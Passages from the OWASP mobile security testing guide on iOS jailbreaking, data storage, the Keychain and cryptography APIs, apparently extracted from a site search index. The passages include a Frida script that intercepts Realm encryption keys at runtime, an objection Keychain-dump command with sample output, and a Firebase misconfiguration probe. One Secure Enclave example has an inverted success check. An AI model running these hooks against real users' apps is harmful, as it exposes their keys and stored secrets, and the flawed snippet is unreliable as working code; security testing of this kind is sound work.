Some apps attempt to detect whether the iOS device on which they're running is jailbroken. This is because jailbreaking deactivates some of iOS' default security mechanisms. However, there are several ways to get around these detections, and we'll introduce them in the chapter \"iOS Anti-Reversing Defenses\".
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#benefits-of-jailbreaking","title":"Benefits of Jailbreaking","text":"End users often jailbreak their devices to tweak the iOS system's appearance, add new features, and install third-party apps from unofficial app stores. For a security tester, however, jailbreaking an iOS device has even more benefits. They include, but aren't limited to, the following:
There are tethered, semi-tethered, semi-untethered, and untethered jailbreaks.
Tethered jailbreaks don't persist through reboots, so re-applying jailbreaks requires the device to be connected (tethered) to a computer during every reboot. The device may not reboot at all if the computer is not connected.
Semi-tethered jailbreaks can't be re-applied unless the device is connected to a computer during reboot. The device can also boot into non-jailbroken mode on its own.
Semi-untethered jailbreaks allow the device to boot on its own, but the kernel patches (or user-land modifications) for disabling code signing aren't applied automatically. The user must re-jailbreak the device by starting an app or visiting a website (not requiring a connection to a computer, hence the term untethered).
Untethered jailbreaks are the most popular choice for end users because they need to be applied only once, after which the device will be permanently jailbroken.
Developing a jailbreak for iOS is becoming more and more complicated as Apple continues to harden their OS. Whenever Apple becomes aware of a vulnerability, it is patched and a system update is pushed out to all users. As it is not possible to downgrade to a specific version of iOS, and since Apple only allows you to update to the latest iOS version, it is a challenge to have a device which is running a version of iOS for which a jailbreak is available. Some vulnerabilities cannot be patched by software, such as the checkm8 exploit affecting the BootROM of all CPUs until A12.
If you have a jailbroken device that you use for security testing, keep it as is unless you're 100% sure that you can re-jailbreak it after upgrading to the latest iOS version. Consider getting one (or multiple) spare device(s) (which will be updated with every major iOS release) and waiting for a jailbreak to be released publicly. Apple is usually quick to release a patch once a jailbreak has been released publicly, so you only have a couple of days to downgrade (if it is still signed by Apple) to the affected iOS version and apply the jailbreak.
iOS upgrades are based on a challenge-response process (generating the so-called SHSH blobs as a result). The device will allow the OS installation only if the response to the challenge is signed by Apple. This is what researchers call a \"signing window\", and it is the reason you can't simply store the OTA firmware package you downloaded and load it onto the device whenever you want to. During minor iOS upgrades, two versions may both be signed by Apple (the latest one, and the previous iOS version). This is the only situation in which you can downgrade the iOS device. You can check the current signing window and download OTA firmware from the IPSW Downloads website.
For some devices and iOS versions, it is possible to downgrade to older versions in case the SHSH blobs for that device were collected when the signing window was active. More information on this can be found on the cfw iOS Guide - Saving Blobs
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#which-jailbreaking-tool-to-use","title":"Which Jailbreaking Tool to Use","text":"Different iOS versions require different jailbreaking techniques. Determine whether a public jailbreak is available for your version of iOS. Beware of fake tools and spyware, which are often hiding behind domain names that are similar to the name of the jailbreaking group/author.
The iOS jailbreak scene evolves so rapidly that providing up-to-date instructions is difficult. However, we can point you to some sources that are currently reliable.
Note that any modification you make to your device is at your own risk. While jailbreaking is typically safe, things can go wrong and you may end up bricking your device. No other party except yourself can be held accountable for any damage.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/","title":"iOS Data Storage","text":""},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#overview","title":"Overview","text":"The protection of sensitive data, such as authentication tokens and private information, is key for mobile security. In this chapter, you'll learn about the iOS APIs for local data storage, and best practices for using them.
As little sensitive data as possible should be saved in permanent local storage. However, in most practical scenarios, at least some user data must be stored. Fortunately, iOS offers secure storage APIs, which allow developers to use the cryptographic hardware available on every iOS device. If these APIs are used correctly, sensitive data and files can be secured via hardware-backed 256-bit AES encryption.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#nsdata-and-nsmutabledata","title":"NSData and NSMutableData","text":"NSData
(static data objects) and NSMutableData
(dynamic data objects) are typically used for data storage, but they are also useful for distributed objects applications, in which data contained in data objects can be copied or moved between applications. The following are methods used to write NSData
objects:
NSDataWritingWithoutOverwriting
NSDataWritingFileProtectionNone
NSDataWritingFileProtectionComplete
NSDataWritingFileProtectionCompleteUnlessOpen
NSDataWritingFileProtectionCompleteUntilFirstUserAuthentication
writeToFile
: stores data as part of the NSData
classNSSearchPathForDirectoriesInDomains, NSTemporaryDirectory
: used to manage file pathsNSFileManager
: lets you examine and change the contents of the file system. You can use createFileAtPath
to create a file and write to it.The following example shows how to create a complete
encrypted file using the FileManager
class. You can find more information in the Apple Developer Documentation \"Encrypting Your App's Files\"
Swift:
FileManager.default.createFile(\n atPath: filePath,\n contents: \"secret text\".data(using: .utf8),\n attributes: [FileAttributeKey.protectionKey: FileProtectionType.complete]\n)\n
Objective-C:
[[NSFileManager defaultManager] createFileAtPath:[self filePath]\n contents:[@\"secret text\" dataUsingEncoding:NSUTF8StringEncoding]\n attributes:[NSDictionary dictionaryWithObject:NSFileProtectionComplete\n forKey:NSFileProtectionKey]];\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#nsuserdefaults","title":"NSUserDefaults","text":"The NSUserDefaults
class provides a programmatic interface for interacting with the default system. The default system allows an application to customize its behavior according to user preferences. Data saved by NSUserDefaults
can be viewed in the application bundle. This class stores data in a plist file, but it's meant to be used with small amounts of data.
Core Data
is a framework for managing the model layer of objects in your application. It provides general and automated solutions to common tasks associated with object life cycles and object graph management, including persistence. Core Data can use SQLite as its persistent store, but the framework itself is not a database.
CoreData does not encrypt it's data by default. As part of a research project (iMAS) from the MITRE Corporation, that was focused on open source iOS security controls, an additional encryption layer can be added to CoreData. See the GitHub Repo for more details.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#sqlite-databases","title":"SQLite Databases","text":"The SQLite 3 library must be added to an app if the app is to use SQLite. This library is a C++ wrapper that provides an API for the SQLite commands.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#firebase-real-time-databases","title":"Firebase Real-time Databases","text":"Firebase is a development platform with more than 15 products, and one of them is Firebase Real-time Database. It can be leveraged by application developers to store and sync data with a NoSQL cloud-hosted database. The data is stored as JSON and is synchronized in real-time to every connected client and also remains available even when the application goes offline.
A misconfigured Firebase instance can be identified by making the following network call:
https://\\<firebaseProjectName\\>.firebaseio.com/.json
The firebaseProjectName can be retrieved from the property list(.plist) file. For example, PROJECT_ID
key stores the corresponding Firebase project name in GoogleService-Info.plist file.
Alternatively, the analysts can use Firebase Scanner, a python script that automates the task above as shown below:
python FirebaseScanner.py -f <commaSeparatedFirebaseProjectNames>\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#realm-databases","title":"Realm Databases","text":"Realm Objective-C and Realm Swift aren't supplied by Apple, but they are still worth noting. They store everything unencrypted, unless the configuration has encryption enabled.
The following example demonstrates how to use encryption with a Realm database:
// Open the encrypted Realm file where getKey() is a method to obtain a key from the Keychain or a server\nlet config = Realm.Configuration(encryptionKey: getKey())\ndo {\n let realm = try Realm(configuration: config)\n // Use the Realm as normal\n} catch let error as NSError {\n // If the encryption key is wrong, `error` will say that it's an invalid database\n fatalError(\"Error opening realm: \\(error)\")\n}\n
Access to the data depends on the encryption: unencrypted databases are easily accessible, while encrypted ones require investigation into how the key is managed - whether it's hardcoded or stored unencrypted in an insecure location such as shared preferences, or securely in the platform's KeyStore (which is best practice). However, if an attacker has sufficient access to the device (e.g. jailbroken access) or can repackage the app, they can still retrieve encryption keys at runtime using tools like Frida. The following Frida script demonstrates how to intercept the Realm encryption key and access the contents of the encrypted database.
function nsdataToHex(data) {\n var hexStr = '';\n for (var i = 0; i < data.length(); i++) {\n var byte = Memory.readU8(data.bytes().add(i));\n hexStr += ('0' + (byte & 0xFF).toString(16)).slice(-2);\n }\n return hexStr;\n}\n\nfunction HookRealm() {\n if (ObjC.available) {\n console.log(\"ObjC is available. Attempting to intercept Realm classes...\");\n const RLMRealmConfiguration = ObjC.classes.RLMRealmConfiguration;\n Interceptor.attach(ObjC.classes.RLMRealmConfiguration['- setEncryptionKey:'].implementation, {\n onEnter: function(args) {\n var encryptionKeyData = new ObjC.Object(args[2]);\n console.log(`Encryption Key Length: ${encryptionKeyData.length()}`);\n // Hexdump the encryption key\n var encryptionKeyBytes = encryptionKeyData.bytes();\n console.log(hexdump(encryptionKeyBytes, {\n offset: 0,\n length: encryptionKeyData.length(),\n header: true,\n ansi: true\n }));\n\n // Convert the encryption key bytes to a hex string\n var encryptionKeyHex = nsdataToHex(encryptionKeyData);\n console.log(`Encryption Key Hex: ${encryptionKeyHex}`);\n },\n onLeave: function(retval) {\n console.log('Leaving RLMRealmConfiguration.- setEncryptionKey:');\n }\n });\n\n }\n\n}\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#couchbase-lite-databases","title":"Couchbase Lite Databases","text":"Couchbase Lite is a lightweight, embedded, document-oriented (NoSQL) database engine that can be synced. It compiles natively for iOS and macOS.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#yapdatabase","title":"YapDatabase","text":"YapDatabase is a key/value store built on top of SQLite.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#user-interface","title":"User Interface","text":""},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#ui-components","title":"UI Components","text":"Entering sensitive information when, for example, registering an account or making payments, is an essential part of using many apps. This data may be financial information such as credit card data or user account passwords. The data may be exposed if the app doesn't properly mask it while it is being typed.
In order to prevent disclosure and mitigate risks such as shoulder surfing you should verify that no sensitive data is exposed via the user interface unless explicitly required (e.g. a password being entered). For the data required to be present it should be properly masked, typically by showing asterisks or dots instead of clear text.
Carefully review all UI components that either show such information or take it as input. Search for any traces of sensitive information and evaluate if it should be masked or completely removed.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#screenshots","title":"Screenshots","text":"Manufacturers want to provide device users with an aesthetically pleasing effect when an application is started or exited, so they introduced the concept of saving a screenshot when the application goes into the background. This feature can pose a security risk because screenshots (which may display sensitive information such as an email or corporate documents) are written to local storage, where they can be recovered by a rogue application with a sandbox bypass exploit or someone who steals the device.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#keyboard-cache","title":"Keyboard Cache","text":"Several options, such as autocorrect and spell check, are available to users to simplify keyboard input and are cached by default in .dat
files in /private/var/mobile/Library/Keyboard/
and its subdirectories.
The UITextInputTraits protocol is used for keyboard caching. The UITextField
, UITextView
, and UISearchBar
classes automatically support this protocol and it offers the following properties:
var autocorrectionType: UITextAutocorrectionType
determines whether autocorrection is enabled during typing. When autocorrection is enabled, the text object tracks unknown words and suggests suitable replacements, replacing the typed text automatically unless the user overrides the replacement. The default value of this property is UITextAutocorrectionTypeDefault
, which for most input methods enables autocorrection.var secureTextEntry: BOOL
determines whether text copying and text caching are disabled and hides the text being entered for UITextField
. The default value of this property is NO
.App developers can leverage the iOS Data Protection APIs to implement fine-grained access control for user data stored in flash memory. The APIs are built on top of the Secure Enclave Processor (SEP), which was introduced with the iPhone 5S. The SEP is a coprocessor that provides cryptographic operations for data protection and key management. A device-specific hardware key-the device UID (Unique ID)-is embedded in the secure enclave, ensuring the integrity of data protection even when the operating system kernel is compromised.
You can learn more about the Secure Enclave in this BlackHat presentation \"Demystifying the Secure Enclave Processor\" by Tarjei Mandt, Mathew Solnik and David Wang.
The data protection architecture is based on a hierarchy of keys. The UID and the user passcode key (which is derived from the user's passphrase via the PBKDF2 algorithm) sit at the top of this hierarchy. Together, they can be used to \"unlock\" so-called class keys, which are associated with different device states (e.g., device locked/unlocked).
Every file stored on the iOS file system is encrypted with its own per-file key, which is contained in the file metadata. The metadata is encrypted with the file system key and wrapped with the class key corresponding to the protection class the app selected when creating the file.
The following illustration shows the iOS Data Protection Key Hierarchy.
Files can be assigned to one of four different protection classes, which are explained in more detail in the iOS Security Guide:
Complete Protection (NSFileProtectionComplete): A key derived from the user passcode and the device UID protects this class key. The derived key is wiped from memory shortly after the device is locked, making the data inaccessible until the user unlocks the device.
Protected Unless Open (NSFileProtectionCompleteUnlessOpen): This protection class is similar to Complete Protection, but, if the file is opened when unlocked, the app can continue to access the file even if the user locks the device. This protection class is used when, for example, a mail attachment is downloading in the background.
Protected Until First User Authentication (NSFileProtectionCompleteUntilFirstUserAuthentication): The file can be accessed as soon as the user unlocks the device for the first time after booting. It can be accessed even if the user subsequently locks the device and the class key is not removed from memory.
No Protection (NSFileProtectionNone): The key for this protection class is protected with the UID only. The class key is stored in \"Effaceable Storage\", which is a region of flash memory on the iOS device that allows the storage of small amounts of data. This protection class exists for fast remote wiping (immediate deletion of the class key, which makes the data inaccessible).
All class keys except NSFileProtectionNone
are encrypted with a key derived from the device UID and the user's passcode. As a result, decryption can happen only on the device itself and requires the correct passcode.
Since iOS 7, the default data protection class is \"Protected Until First User Authentication\".
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#external-storage","title":"External Storage","text":""},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#the-keychain","title":"The Keychain","text":"The iOS Keychain can be used to securely store short, sensitive bits of data, such as encryption keys and session tokens. It is implemented as an SQLite database that can be accessed through the Keychain APIs only.
On macOS, every user application can create as many Keychains as desired, and every login account has its own Keychain. The structure of the Keychain on iOS is different: only one Keychain is available to all apps. Access to the items can be shared between apps signed by the same developer via the access groups feature of the attribute kSecAttrAccessGroup
. Access to the Keychain is managed by the securityd
daemon, which grants access according to the app's Keychain-access-groups
, application-identifier
, and application-group
entitlements.
The Keychain API includes the following main operations:
SecItemAdd
SecItemUpdate
SecItemCopyMatching
SecItemDelete
Data stored in the Keychain is protected via a class structure that is similar to the class structure used for file encryption. Items added to the Keychain are encoded as a binary plist and encrypted with a 128-bit AES per-item key in Galois/Counter Mode (GCM). Note that larger blobs of data aren't meant to be saved directly in the Keychain-that's what the Data Protection API is for. You can configure data protection for Keychain items by setting the kSecAttrAccessible
key in the call to SecItemAdd
or SecItemUpdate
. The following configurable accessibility values for kSecAttrAccessible are the Keychain Data Protection classes:
kSecAttrAccessibleAlways
: The data in the Keychain item can always be accessed, regardless of whether the device is locked.kSecAttrAccessibleAlwaysThisDeviceOnly
: The data in the Keychain item can always be accessed, regardless of whether the device is locked. The data won't be included in an iCloud or local backup.kSecAttrAccessibleAfterFirstUnlock
: The data in the Keychain item can't be accessed after a restart until the device has been unlocked once by the user.kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly
: The data in the Keychain item can't be accessed after a restart until the device has been unlocked once by the user. Items with this attribute do not migrate to a new device. Thus, after restoring from a backup of a different device, these items will not be present.kSecAttrAccessibleWhenUnlocked
: The data in the Keychain item can be accessed only while the device is unlocked by the user.kSecAttrAccessibleWhenUnlockedThisDeviceOnly
: The data in the Keychain item can be accessed only while the device is unlocked by the user. The data won't be included in an iCloud or local backup.kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
: The data in the Keychain can be accessed only when the device is unlocked. This protection class is only available if a passcode is set on the device. The data won't be included in an iCloud or local backup.AccessControlFlags
define the mechanisms with which users can authenticate the key (SecAccessControlCreateFlags
):
kSecAccessControlDevicePasscode
: Access the item via a passcode.kSecAccessControlBiometryAny
: Access the item via one of the fingerprints registered to Touch ID. Adding or removing a fingerprint won't invalidate the item.kSecAccessControlBiometryCurrentSet
: Access the item via one of the fingerprints registered to Touch ID. Adding or removing a fingerprint will invalidate the item.kSecAccessControlUserPresence
: Access the item via either one of the registered fingerprints (using Touch ID) or default to the passcode.Please note that keys secured by Touch ID (via kSecAccessControlBiometryAny
or kSecAccessControlBiometryCurrentSet
) are protected by the Secure Enclave: The Keychain holds a token only, not the actual key. The key resides in the Secure Enclave.
Starting with iOS 9, you can do ECC-based signing operations in the Secure Enclave. In that scenario, the private key and the cryptographic operations reside within the Secure Enclave. See the static analysis section for more info on creating the ECC keys. iOS 9 supports only 256-bit ECC. Furthermore, you need to store the public key in the Keychain because it can't be stored in the Secure Enclave. After the key is created, you can use the kSecAttrKeyType
to indicate the type of algorithm you want to use the key with.
In case you want to use these mechanisms, it is recommended to test whether the passcode has been set. In iOS 8, you will need to check whether you can read/write from an item in the Keychain protected by the kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
attribute. From iOS 9 onward you can check whether a lock screen is set, using LAContext
:
Swift:
public func devicePasscodeEnabled() -> Bool {\n return LAContext().canEvaluatePolicy(.deviceOwnerAuthentication, error: nil)\n}\n
Objective-C:
-(BOOL)devicePasscodeEnabled:(LAContext)context{\n if ([context canEvaluatePolicy:LAPolicyDeviceOwnerAuthentication error:nil]) {\n return true;\n } else {\n return false;\n }\n}\n
Here is sample Swift code you can use to create keys (Notice the kSecAttrTokenID as String: kSecAttrTokenIDSecureEnclave
: this indicates that we want to use the Secure Enclave directly.):
// private key parameters\nlet privateKeyParams = [\n kSecAttrLabel as String: \"privateLabel\",\n kSecAttrIsPermanent as String: true,\n kSecAttrApplicationTag as String: \"applicationTag\",\n] as CFDictionary\n\n// public key parameters\nlet publicKeyParams = [\n kSecAttrLabel as String: \"publicLabel\",\n kSecAttrIsPermanent as String: false,\n kSecAttrApplicationTag as String: \"applicationTag\",\n] as CFDictionary\n\n// global parameters\nlet parameters = [\n kSecAttrKeyType as String: kSecAttrKeyTypeEC,\n kSecAttrKeySizeInBits as String: 256,\n kSecAttrTokenID as String: kSecAttrTokenIDSecureEnclave,\n kSecPublicKeyAttrs as String: publicKeyParams,\n kSecPrivateKeyAttrs as String: privateKeyParams,\n] as CFDictionary\n\nvar pubKey, privKey: SecKey?\nlet status = SecKeyGeneratePair(parameters, &pubKey, &privKey)\n\nif status != errSecSuccess {\n // Keys created successfully\n}\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#keychain-data-persistence","title":"Keychain Data Persistence","text":"On iOS, when an application is uninstalled, the Keychain data used by the application is retained by the device, unlike the data stored by the application sandbox which is wiped. In the event that a user sells their device without performing a factory reset, the buyer of the device may be able to gain access to the previous user's application accounts and data by reinstalling the same applications used by the previous user. This would require no technical ability to perform.
When assessing an iOS application, you should look for Keychain data persistence. This is normally done by using the application to generate sample data that may be stored in the Keychain, uninstalling the application, then reinstalling the application to see whether the data was retained between application installations. Use objection runtime mobile exploration toolkit to dump the keychain data. The following objection
command demonstrates this procedure:
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios keychain dump\nNote: You may be asked to authenticate using the devices passcode or TouchID\nSave the output by adding `--json keychain.json` to this command\nDumping the iOS keychain...\nCreated Accessible ACL Type Account Service Data\n------------------------- ------------------------------ ----- -------- ------------------------- ------------------------------------------------------------- ------------------------------------\n2020-02-11 13:26:52 +0000 WhenUnlocked None Password keychainValue com.highaltitudehacks.DVIAswiftv2.develop mysecretpass123\n
There's no iOS API that developers can use to force wipe data when an application is uninstalled. Instead, developers should take the following steps to prevent Keychain data from persisting between application installations:
let userDefaults = UserDefaults.standard\n\nif userDefaults.bool(forKey: \"hasRunBefore\") == false {\n // Remove Keychain items here\n\n // Update the flag indicator\n userDefaults.set(true, forKey: \"hasRunBefore\")\n}\n
There are many legitimate reasons for creating log files on a mobile device, including keeping track of crashes or errors that are stored locally while the device is offline (so that they can be sent to the app's developer once online), and storing usage statistics. However, logging sensitive data, such as credit card numbers and session information, may expose the data to attackers or malicious applications. Log files can be created in several ways. The following list shows the methods available on iOS:
iOS includes auto-backup features that create copies of the data stored on the device. You can make iOS backups from your host computer by using iTunes (till macOS Catalina) or Finder (from macOS Catalina onwards), or via the iCloud backup feature. In both cases, the backup includes nearly all data stored on the iOS device except highly sensitive data such as Apple Pay information and Touch ID settings.
Since iOS backs up installed apps and their data, an obvious concern is whether sensitive user data stored by the app might unintentionally leak through the backup. Another concern, though less obvious, is whether sensitive configuration settings used to protect data or restrict app functionality could be tampered to change app behavior after restoring a modified backup. Both concerns are valid and these vulnerabilities have proven to exist in a vast number of apps today.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#how-the-keychain-is-backed-up","title":"How the Keychain Is Backed Up","text":"When users back up their iOS device, the Keychain data is backed up as well, but the secrets in the Keychain remain encrypted. The class keys necessary to decrypt the Keychain data aren't included in the backup. Restoring the Keychain data requires restoring the backup to a device and unlocking the device with the users passcode.
Keychain items for which the kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
attribute is set can be decrypted only if the backup is restored to the backed up device. Someone trying to extract this Keychain data from the backup couldn't decrypt it without access to the crypto hardware inside the originating device.
One caveat to using the Keychain, however, is that it was only designed to store small bits of user data or short notes (according to Apple's documentation on Keychain Services). This means that apps with larger local secure storage needs (e.g., messaging apps, etc.) should encrypt the data within the app container, but use the Keychain to store key material. In cases where sensitive configuration settings (e.g., data loss prevention policies, password policies, compliance policies, etc) must remain unencrypted within the app container, you can consider storing a hash of the policies in the keychain for integrity checking. Without an integrity check, these settings could be modified within a backup and then restored back to the device to modify app behavior (e.g., change configured remote endpoints) or security settings (e.g., jailbreak detection, certificate pinning, maximum UI login attempts, etc.).
The takeaway: If sensitive data is handled as recommended earlier in this chapter (e.g., stored in the Keychain, with Keychain backed integrity checks, or encrypted with a key that's locked inside the Keychain), backups shouldn't be security issue.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#process-memory","title":"Process Memory","text":"Analyzing memory can help developers to identify the root causes of problems such as application crashes. However, it can also be used to access to sensitive data. This section describes how to check process' memory for data disclosure.
First, identify the sensitive information that's stored in memory. Sensitive assets are very likely to be loaded into memory at some point. The objective is to make sure that this info is exposed as briefly as possible.
To investigate an application's memory, first create a memory dump. Alternatively, you can analyze the memory in real time with, for example, a debugger. Regardless of the method you use, this is a very error-prone process because dumps provide the data left by executed functions and you might miss executing critical steps. In addition, overlooking data during analysis is quite easy to do unless you know the footprint of the data you're looking for (either its exact value or its format). For example, if the app encrypts according to a randomly generated symmetric key, you're very unlikely to spot the key in memory unless you find its value by other means.
Before looking into the source code, checking the documentation and identifying application components provide an overview of where data might be exposed. For example, while sensitive data received from a backend exists in the final model object, multiple copies may also exist in the HTTP client or the XML parser. All these copies should be removed from memory as soon as possible.
Understanding the application's architecture and its interaction with the OS will help you identify sensitive information that doesn't have to be exposed in memory at all. For example, assume your app receives data from one server and transfers it to another without needing any additional processing. That data can be received and handled in encrypted form, which prevents exposure via memory.
However, if sensitive data does need to be exposed via memory, make sure that your app exposes as few copies of this data as possible for as little time as possible. In other words, you want centralized handling of sensitive data, based on primitive and mutable data structures.
Such data structures give developers direct access to memory. Make sure that this access is used to overwrite the sensitive data and cryptographic keys with zeroes. Apple Secure Coding Guide suggests zeroing sensitive data after usage, but provides no recommended ways of doing this.
Examples of preferable data types include char []
and int []
, but not NSString
or String
. Whenever you try to modify an immutable object, such as a String
, you actually create a copy and change the copy. Consider using NSMutableData
for storing secrets on Swift/Objective-C and use resetBytes(in:)
method for zeroing. Also, see Clean memory of secret data for reference.
Avoid Swift data types other than collections regardless of whether they are considered mutable. Many Swift data types hold their data by value, not by reference. Although this allows modification of the memory allocated to simple types like char
and int
, handling a complex type such as String
by value involves a hidden layer of objects, structures, or primitive arrays whose memory can't be directly accessed or modified. Certain types of usage may seem to create a mutable data object (and even be documented as doing so), but they actually create a mutable identifier (variable) instead of an immutable identifier (constant). For example, many think that the following results in a mutable String
in Swift, but this is actually an example of a variable whose complex value can be changed (replaced, not modified in place):
var str1 = \"Goodbye\" // \"Goodbye\", base address: 0x0001039e8dd0\nstr1.append(\" \") // \"Goodbye \", base address: 0x608000064ae0\nstr1.append(\"cruel world!\") // \"Goodbye cruel world\", base address: 0x6080000338a0\nstr1.removeAll() // \"\", base address 0x00010bd66180\n
Notice that the base address of the underlying value changes with each string operation. Here is the problem: To securely erase the sensitive information from memory, we don't want to simply change the value of the variable; we want to change the actual content of the memory allocated for the current value. Swift doesn't offer such a function.
Swift collections (Array
, Set
, and Dictionary
), on the other hand, may be acceptable if they collect primitive data types such as char
or int
and are defined as mutable (i.e., as variables instead of constants), in which case they are more or less equivalent to a primitive array (such as char []
). These collections provide memory management, which can result in unidentified copies of the sensitive data in memory if the collection needs to copy the underlying buffer to a different location to extend it.
Using mutable Objective-C data types, such as NSMutableString
, may also be acceptable, but these types have the same memory issue as Swift collections. Pay attention when using Objective-C collections; they hold data by reference, and only Objective-C data types are allowed. Therefore, we are looking, not for a mutable collection, but for a collection that references mutable objects.
As we've seen so far, using Swift or Objective-C data types requires a deep understanding of the language implementation. Furthermore, there has been some core re-factoring in between major Swift versions, resulting in many data types' behavior being incompatible with that of other types. To avoid these issues, we recommend using primitive data types whenever data needs to be securely erased from memory.
Unfortunately, few libraries and frameworks are designed to allow sensitive data to be overwritten. Not even Apple considers this issue in the official iOS SDK API. For example, most of the APIs for data transformation (passers, serializes, etc.) operate on non-primitive data types. Similarly, regardless of whether you flag some UITextField
as Secure Text Entry or not, it always returns data in the form of a String
or NSString
.
Inter Process Communication (IPC) allows processes to send each other messages and data. For processes that need to communicate with each other, there are different ways to implement IPC on iOS:
launchd
. It is the most secure and flexible implementation of IPC on iOS and should be the preferred method. It runs in the most restricted environment possible: sandboxed with no root privilege escalation and minimal file system access and network access. Two different APIs are used with XPC Services:NSFileCoordinator
can be used to manage and send data to and from apps via files that are available on the local file system to various processes. NSFileCoordinator methods run synchronously, so your code will be blocked until they stop executing. That's convenient because you don't have to wait for an asynchronous block callback, but it also means that the methods block the running thread.In the \"Mobile App Cryptography\" chapter, we introduced general cryptography best practices and described typical issues that can occur when cryptography is used incorrectly. In this chapter, we'll go into more detail on iOS's cryptography APIs. We'll show how to identify usage of those APIs in the source code and how to interpret cryptographic configurations. When reviewing code, make sure to compare the cryptographic parameters used with the current best practices linked from this guide.
Apple provides libraries that include implementations of most common cryptographic algorithms. Apple's Cryptographic Services Guide is a great reference. It contains generalized documentation of how to use standard libraries to initialize and use cryptographic primitives, information that is useful for source code analysis.
"},{"location":"MASTG/iOS/0x06e-Testing-Cryptography/#cryptokit","title":"CryptoKit","text":"Apple CryptoKit was released with iOS 13 and is built on top of Apple's native cryptographic library corecrypto which is FIPS 140-2 validated. The Swift framework provides a strongly typed API interface, has effective memory management, conforms to equatable, and supports generics. CryptoKit contains secure algorithms for hashing, symmetric-key cryptography, and public-key cryptography. The framework can also utilize the hardware based key manager from the Secure Enclave.
Apple CryptoKit contains the following algorithms:
Hashes:
Symmetric-Key:
Public-Key:
Examples:
Generating and releasing a symmetric key:
let encryptionKey = SymmetricKey(size: .bits256)\n
Calculating a SHA-2 512-bit digest:
let rawString = \"OWASP MTSG\"\nlet rawData = Data(rawString.utf8)\nlet hash = SHA512.hash(data: rawData) // Compute the digest\nlet textHash = String(describing: hash)\nprint(textHash) // Print hash text\n
For more information about Apple CryptoKit, please visit the following resources:
The most commonly used Class for cryptographic operations is the CommonCrypto, which is packed with the iOS runtime. The functionality offered by the CommonCrypto object can best be dissected by having a look at the source code of the header file:
Commoncryptor.h
gives the parameters for the symmetric cryptographic operations.CommonDigest.h
gives the parameters for the hashing Algorithms.CommonHMAC.h
gives the parameters for the supported HMAC operations.CommonKeyDerivation.h
gives the parameters for supported KDF functions.CommonSymmetricKeywrap.h
gives the function used for wrapping a symmetric key with a Key Encryption Key.Unfortunately, CommonCryptor lacks a few types of operations in its public APIs, such as: GCM mode is only available in its private APIs See its source code. For this, an additional binding header is necessary or other wrapper libraries can be used.
Next, for asymmetric operations, Apple provides SecKey. Apple provides a nice guide in its Developer Documentation on how to use this.
As noted before: some wrapper-libraries exist for both in order to provide convenience. Typical libraries that are used are, for instance:
There are various third party libraries available, such as:
There are various methods on how to store the key on the device. Not storing a key at all will ensure that no key material can be dumped. This can be achieved by using a Password Key Derivation function, such as PKBDF-2. See the example below:
func pbkdf2SHA1(password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n return pbkdf2(hash: CCPBKDFAlgorithm(kCCPRFHmacAlgSHA1), password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n\nfunc pbkdf2SHA256(password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n return pbkdf2(hash: CCPBKDFAlgorithm(kCCPRFHmacAlgSHA256), password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n\nfunc pbkdf2SHA512(password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n return pbkdf2(hash: CCPBKDFAlgorithm(kCCPRFHmacAlgSHA512), password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n\nfunc pbkdf2(hash: CCPBKDFAlgorithm, password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n let passwordData = password.data(using: String.Encoding.utf8)!\n var derivedKeyData = Data(repeating: 0, count: keyByteCount)\n let derivedKeyDataLength = derivedKeyData.count\n let derivationStatus = derivedKeyData.withUnsafeMutableBytes { derivedKeyBytes in\n salt.withUnsafeBytes { saltBytes in\n\n CCKeyDerivationPBKDF(\n CCPBKDFAlgorithm(kCCPBKDF2),\n password, passwordData.count,\n saltBytes, salt.count,\n hash,\n UInt32(rounds),\n derivedKeyBytes, derivedKeyDataLength\n )\n }\n }\n if derivationStatus != 0 {\n // Error\n return nil\n }\n\n return derivedKeyData\n}\n\nfunc testKeyDerivation() {\n let password = \"password\"\n let salt = Data([0x73, 0x61, 0x6C, 0x74, 0x44, 0x61, 0x74, 0x61])\n let keyByteCount = 16\n let rounds = 100_000\n\n let derivedKey = pbkdf2SHA1(password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n
Arcane
libraryWhen you need to store the key, it is recommended to use the Keychain as long as the protection class chosen is not kSecAttrAccessibleAlways
. Storing keys in any other location, such as the NSUserDefaults
, property list files or by any other sink from Core Data or Realm, is usually less secure than using the KeyChain. Even when the sync of Core Data or Realm is protected by using NSFileProtectionComplete
data protection class, we still recommend using the KeyChain. See the chapter \"Data Storage on iOS\" for more details.
The KeyChain supports two type of storage mechanisms: a key is either secured by an encryption key stored in the secure enclave or the key itself is within the secure enclave. The latter only holds when you use an ECDH signing key. See the Apple Documentation for more details on its implementation.
